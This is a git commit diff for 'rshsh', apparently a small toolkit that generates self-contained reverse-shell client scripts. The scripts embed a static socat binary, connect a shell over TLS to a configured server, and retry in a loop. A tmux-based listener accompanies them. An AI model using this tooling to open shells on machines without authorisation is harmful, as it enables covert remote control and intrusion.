diff options
| author | Mitchell Riedstra <mitch@riedstra.dev> | 2022-12-26 13:06:48 -0500 |
|---|---|---|
| committer | Mitchell Riedstra <mitch@riedstra.dev> | 2022-12-26 13:06:48 -0500 |
| commit | 639e50050702d094a9464cf263995f7f19079eaf (patch) | |
| tree | cd6502f6d5af67e5a887474ed3225af37a20cd02 | |
| parent | 9bd432b5de3592f89d885deaff953418822acaa9 (diff) | |
| download | rshsh-639e50050702d094a9464cf263995f7f19079eaf.tar.gz rshsh-639e50050702d094a9464cf263995f7f19079eaf.tar.xz | |
| -rw-r--r-- | .gitignore | 5 | ||||
| -rwxr-xr-x | genclient-embed.sh | 48 | ||||
| -rwxr-xr-x | genclient.sh | 7 | ||||
| -rwxr-xr-x | lib/spawn | 13 | ||||
| -rw-r--r-- | readme.md | 7 | ||||
| -rwxr-xr-x | server.sh | 4 | ||||
| -rw-r--r-- | socat/Dockerfile | 13 | ||||
| -rwxr-xr-x | socat/build.sh | 5 | ||||
| -rw-r--r-- | vars | 4 |
9 files changed, 93 insertions, 13 deletions
@@ -1,3 +1,2 @@ -*.crt -*.key -*.pem +/keys/* +/socat/socat diff --git a/genclient-embed.sh b/genclient-embed.sh new file mode 100755 index 0000000..8c4c144 --- /dev/null +++ b/genclient-embed.sh @@ -0,0 +1,48 @@ +#!/bin/sh + +. ./vars + +help() { +cat <<EOF +Usage: $0 + + Generates a client shell script based on the variables set in 'vars' + and prints to stdout + +EOF +exit 1; +} + +while [ $# -gt 0 ] ; do case $1 in + *) help ;; +esac; done + +cat <<EOF +#!/bin/sh +socat="\$(mktemp)" + +sed -ne'/^__BEGIN'_'SOCAT__/,\$p' "\$0" | sed 1d | base64 -d \\ + | gzip -dc > "\$socat" + +chmod +x "\$socat" + +_shell="\$(which zsh mksh bash ksh zsh ash sh 2>/dev/null | sed 1q)" +certificate='$(cat ${basename}.crt)' +crt_tmp="\$(mktemp)" +trap 'rm -f \$crt_tmp \$socat; exit 0' EXIT INT +echo "\$certificate" > "\$crt_tmp" +while [ $loop -ne 0 ] ; do +"\$socat" exec:"\$_shell",pty,stderr,setsid,sigint,sane \\ + "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp" +sleep $timeout +done + +exit 0 + +__BEGIN_SOCAT__ +EOF + +if [ -e socat/socat ] ; then + gzip -9c < socat/socat | base64 +fi + diff --git a/genclient.sh b/genclient.sh index 9984a8b..6e2cda2 100755 --- a/genclient.sh +++ b/genclient.sh @@ -23,10 +23,13 @@ cat <<EOF _shell="\$(which zsh mksh bash ksh zsh ash sh 2>/dev/null | sed 1q)" certificate='$(cat ${basename}.crt)' crt_tmp="\$(mktemp)" +trap 'rm -f \$crt_tmp; exit 0' EXIT INT echo "\$certificate" > "\$crt_tmp" while [ $loop -ne 0 ] ; do -socat exec:"\$_shell",pty,stderr,setsid,sigint,sane OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp +socat exec:"\$_shell",pty,stderr,setsid,sigint,sane \\ + "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp" sleep $timeout done -rm "\$crt_tmp" + +exit 0 EOF @@ -4,16 +4,19 @@ SOCKDIR=$(mktemp -d) SOCKF=${SOCKDIR}/usock +trap 'rm -rf $SOCKDIR' EXIT INT + # Start tmux, if needed -if ! tmux ls | grep -q rshsh; then - tmux new -s rshsh -d +if ! tmux ls | grep -q "$tmux_session"; then + tmux new -s "$tmux_session" -d fi # Create window -tmux new-window -t rshsh "socat UNIX-LISTEN:${SOCKF},umask=0077 file:\$(tty),raw,echo=0" +tmux new-window -t "$tmux_session" \ + "stty raw -echo ; socat file:\$(tty),raw,echo=0 UNIX-LISTEN:${SOCKF},umask=0077" # Wait for socket -while test ! -e ${SOCKF} ; do sleep 1 ; done +while test ! -e "${SOCKF}" ; do sleep 1 ; done # Use socat to ship data between the unix socket and STDIO. -exec socat STDIO UNIX-CONNECT:${SOCKF} +exec socat STDIO "UNIX-CONNECT:${SOCKF}" @@ -31,6 +31,13 @@ $ ./genclient.sh > /tmp/client.sh And you can `scp` it off to your other boxes or whatever. Even copy and paste works. +## Building static socat + +In the `socat` directory there's a `build.sh` that can be used to build +a statically linked socat binary. + +There's a script `genclient-embed.sh` which can then be used to generate a +client script that has socat embedded. ## Attaching to a connected reverse shell @@ -12,7 +12,7 @@ EOF while [ $# -gt 0 ] ; do case $1 in -p) port="$2"; shift ; shift ;; -k) key="$2"; shift ; shift ;; - *) help ;; + *) help ; exit 1;; esac ; done if ! [ -e "$key" ] ; then @@ -20,4 +20,4 @@ if ! [ -e "$key" ] ; then cat "${basename}.key" "${basename}.crt" > "${basename}.pem" fi -socat OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork EXEC:lib/spawn +socat "OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork" "EXEC:lib/spawn" diff --git a/socat/Dockerfile b/socat/Dockerfile new file mode 100644 index 0000000..1cfd72a --- /dev/null +++ b/socat/Dockerfile @@ -0,0 +1,13 @@ +FROM docker.io/alpine:latest +ARG SOCAT_VERSION + +RUN apk add gcc make alpine-sdk openssl-dev openssl-libs-static + +RUN wget http://www.dest-unreach.org/socat/download/socat-$SOCAT_VERSION.tar.gz + +RUN tar xfzv socat-$SOCAT_VERSION.tar.gz + +WORKDIR /socat-$SOCAT_VERSION + +RUN env LDFLAGS=-static ./configure --enable-openssl && make -j$(nproc) + diff --git a/socat/build.sh b/socat/build.sh new file mode 100755 index 0000000..e50e5bf --- /dev/null +++ b/socat/build.sh @@ -0,0 +1,5 @@ +#!/bin/sh +SOCAT_VERSION=1.7.3.4 +image=socat-builder:latest +buildah build --build-arg SOCAT_VERSION=$SOCAT_VERSION -t $image . +podman run --rm -v "$(pwd)":/out/ $image cp -v /socat-$SOCAT_VERSION/socat /out/ @@ -1,7 +1,9 @@ #!/bin/sh +# What tmux session are we going to use for this? +tmux_session="rshsh" # Server's hostname -hostname="do.rygel.us" +hostname="changeme.example.com" # Do we verify the server certificate? verify=1 # This is used to tell the client script whether it should loop in infinity |